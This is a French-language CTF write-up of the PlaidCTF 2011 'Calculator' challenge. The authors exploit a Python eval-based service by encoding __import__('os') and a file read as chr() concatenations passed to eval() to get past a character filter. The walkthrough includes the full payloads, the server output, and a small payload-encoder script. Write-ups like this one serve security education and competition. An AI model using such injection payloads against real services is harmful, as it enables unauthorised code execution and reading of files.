.:HowTo.Shell-Storm.org:. | Write-up - PlaidCTF 2011 - Calculator
Search Shellcodes   
   
        
    Home | Project | Shellcodes | HowTo | Papers | Search | WarGame | Repo | Network

 

 Shell-Storm.org is a development organization based on GNU/Linux systems 
 that provide free projects and source codes.
 Shell-storm.org provides useful information to people who perform security testing.

 

 Title: Write-up - PlaidCTF 2011 - Calculator  Language: French  Author: 0vercl0k & Jonathan Salwan  Date 2011-04-25  Back

 

Description: AED's summer internship program is notorious for attracting terrible programmers. They've resorted to giving them some of the simplest projects to work on. We expect this service that the latest 'All-Star' intern worked on all summer is no where near secure. Nous avions donc un service qui nous permettait de faire des calculs: Exemple: jonathan@ArchLinux [/] $ nc a9.amalgamated.biz 60124 1 + 2 * 3 Welcome to the online calculator. Please enter your expression below. About to Calculate: Calculating: 1 + 2 * 3 Equals: 7 jonathan@ArchLinux [/] $ Le service qui tournait derrière était du python. jonathan@ArchLinux [/] $ nc a9.amalgamated.biz 60124 help() Welcome to the online calculator. Please enter your expression below. About to Calculate: Calculating: help() Equals: Welcome to Python 2.6! This is the online help utility. If this is your first time using Python, you should definitely check out the tutorial on the Internet at http://docs.python.org/tutorial/. Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit". To get a list of available modules, keywords, or topics, type "modules", "keywords", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose summaries contain a given word such as "spam", type "modules spam". help> You are now leaving help and returning to the Python interpreter. If you want to ask for help on a particular object directly from the interpreter, you can type "help(object)". Executing "help('string')" has the same effect as typing a particular string at the help> prompt. None jonathan@ArchLinux [/] $ jonathan@ArchLinux [/] $ nc a9.amalgamated.biz 60124 globals() Welcome to the online calculator. Please enter your expression below. About to Calculate: Calculating: globals() Equals: {'__builtins__': , '__file__': '/home/calculator/calculator.py', 'brokenSanitizeString': , '__package__': None, '__name__': '__main__', 'main': , '__doc__': None, 'calculator': } jonathan@ArchLinux [/] $ Ok, donc le script qui tourne est /home/calculator/calculator.py Le but du jeu est donc d'exécuter du code python sur la machine pour pouvoir afficher la key. Un petit bémol, certains caractères sont interdit tel que: ._/="' etc... Nous allons donc avoir besoin "d'encoder" notre chaîne. Nous allons pouvoir envoyer nos caractères avec chr() puis exécuter le code avec eval() Nous allons faire un premier test pour écrire sur le socket. Nous allons envoyer __import__('os').write(1, 'salut') jonathan@ArchLinux [/] $ nc a9.amalgamated.biz 60124 eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+chr(0x5f)+ chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x77)+chr(0x72)+chr(0x69)+ chr(0x74)+chr(0x65)+chr(0x28)+chr(0x31)+chr(0x2c)+chr(0x20)+chr(0x27)+chr(0x73)+chr(0x61)+chr(0x6c)+ chr(0x75)+chr(0x74)+chr(0x27)+chr(0x29)) salut Welcome to the online calculator. Please enter your expression below. About to Calculate: Calculating: eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+ chr(0x5f)+chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x77)+chr(0x72)+ chr(0x69)+chr(0x74)+chr(0x65)+chr(0x28)+chr(0x31)+chr(0x2c)+chr(0x20)+chr(0x27)+chr(0x73)+chr(0x61) +chr(0x6c)+chr(0x75)+chr(0x74)+chr(0x27)+chr(0x29)) Equals: 5 W00t, nous avons bien écrit "salut" sur le socket. Maintenant il nous faut afficher la "key". On envoie donc: __import__('os').write(1, open('/home/calculator/key').read()) jonathan@ArchLinux [/] $ nc a9.amalgamated.biz 60124 eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+chr(0x5f)+ chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x77)+chr(0x72)+chr(0x69)+ chr(0x74)+chr(0x65)+chr(0x28)+chr(0x31)+chr(0x2c)+chr(0x20)+chr(0x6f)+chr(0x70)+chr(0x65)+chr(0x6e)+ chr(0x28)+chr(0x27)+chr(0x2f)+chr(0x68)+chr(0x6f)+chr(0x6d)+chr(0x65)+chr(0x2f)+chr(0x63)+chr(0x61)+ chr(0x6c)+chr(0x63)+chr(0x75)+chr(0x6c)+chr(0x61)+chr(0x74)+chr(0x6f)+chr(0x72)+chr(0x2f)+chr(0x6b)+ chr(0x65)+chr(0x79)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x72)+chr(0x65)+chr(0x61)+chr(0x64)+chr(0x28)+ chr(0x29)+chr(0x29)) Y0_dawg,_I_he4rd_you_l1ke_EvA1 Welcome to the online calculator. Please enter your expression below. About to Calculate: Calculating: eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+ chr(0x5f)+chr(0x5f)+chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x77)+ chr(0x72)+chr(0x69)+chr(0x74)+chr(0x65)+chr(0x28)+chr(0x31)+chr(0x2c)+chr(0x20)+chr(0x6f)+chr(0x70)+ chr(0x65)+chr(0x6e)+chr(0x28)+chr(0x27)+chr(0x2f)+chr(0x68)+chr(0x6f)+chr(0x6d)+chr(0x65)+chr(0x2f)+ chr(0x63)+chr(0x61)+chr(0x6c)+chr(0x63)+chr(0x75)+chr(0x6c)+chr(0x61)+chr(0x74)+chr(0x6f)+chr(0x72)+ chr(0x2f)+chr(0x6b)+chr(0x65)+chr(0x79)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x72)+chr(0x65)+chr(0x61)+ chr(0x64)+chr(0x28)+chr(0x29)+chr(0x29)) Equals: 31 jonathan@ArchLinux [/] $ Et voilà, la key est "Y0_dawg,_I_he4rd_you_l1ke_EvA1" Un grand bravo à 0vercl0k avec qui, on a validé l'épreuve. :) Et voici en bonus son code python permettant "d'encoder" la chaîne. # -*- coding: utf-8 -*- # By 0vercl0k import sys def main(argc, argv): code = "__import__('os').write(1, open('/home/calculator/key').read())" payload = 'eval(' for i in range(len(code)): payload += "chr(0x%.2x)" % ord(code[i]) if i+1 != len(code): payload += '+' payload += ')' print payload return 1 if __name__ == '__main__': sys.exit(main(len(sys.argv), sys.argv))

 

 

 Links :
         Others DNS :
 
   Nuit Du Hack  Sysdream  ZeroScience      DNS 1
   Acissi  StalkR's Blog  Peter Van Eeckhoutte's Blog      DNS 2
   Shatter's blog  Nibbles microblog  Ghosts In The Stack      DNS 3
   W4kfu's bl0g  0vercl0k's blog  Ivanlef0u's blog      DNS 4
   falken's blog  Mysterie's blog  Sh4ka's Blog      DNS 5
   Root-Me  m_101's blog  Sm0k's blog    
 
Shell-Storm Network - 2008-2011